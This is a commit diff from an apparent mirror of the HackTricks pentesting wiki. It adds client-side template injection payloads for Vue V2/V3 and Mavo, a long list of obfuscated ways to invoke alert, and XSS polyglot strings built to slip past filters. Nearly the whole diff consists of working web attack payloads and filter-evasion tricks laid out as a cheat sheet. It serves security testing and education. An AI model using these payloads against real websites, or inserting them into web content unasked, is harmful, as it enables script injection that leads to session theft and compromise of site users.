0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-02-25 11:39:28 +00:00 committed by gitbook-bot
parent 7517161d89
commit b524d4bca9
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 72 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
pentesting-web/client-side-template-injection-csti.md
View File

@ -35,12 +35,30 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
### **V3**
```text
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
### **V2**
```text
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
### Mavo
Payload:
```text
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
```

55
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -421,8 +421,60 @@ Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
```
### General tricks
**To constructing strings**
Regex literals:
`/part1/.source+/part2/.source` =&gt; `'part1part2'`
Numbers to strings:
`8680439..toString(30)` =&gt; `'alert'` \( Number is generated using parseInt\(“alert”,30\), other bases also work \)
**use character escape sequences inside of strings**
simple tool for this is available [here](https://mothereff.in/js-escapes):
`"\x41" -> "A"`: hex encoding
`"\u0065" -> "A"`: unicode encoding \(value is decimal\)
`"\101" -> "A"`: octal encoding
**VaRy ThE capItaliZatiOn**
Sometimes a regex or other custom-made filters do case sensitive matching. You can then just use a toLowerCase\(\), like:
`globalThis["aLeRt".toLowerCase()]`
**Calling functions**
``alert`1``` : Template literal syntax
`alert.apply(this,[1])`: Using Function.prototype.apply
`alert.call(this,1)`: Using Function.prototype.call
`alert(1)`: Obviously, but included for completeness.
`[1].find(alert)`: Using predicates
`[1].filter(alert)`: Using predicates
**Reuse and recycle**
Remember to look into what is already loaded! jQuery is an easy example, but any sufficiently complex framework will likely have something usable. [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en) or equivalent can help here.
`window.jQuery.globalEval("alert(1)")`
`$.globalEval("alert(1)")`
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
@ -667,6 +719,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
### Polyglots
```javascript
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
@ -685,7 +738,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`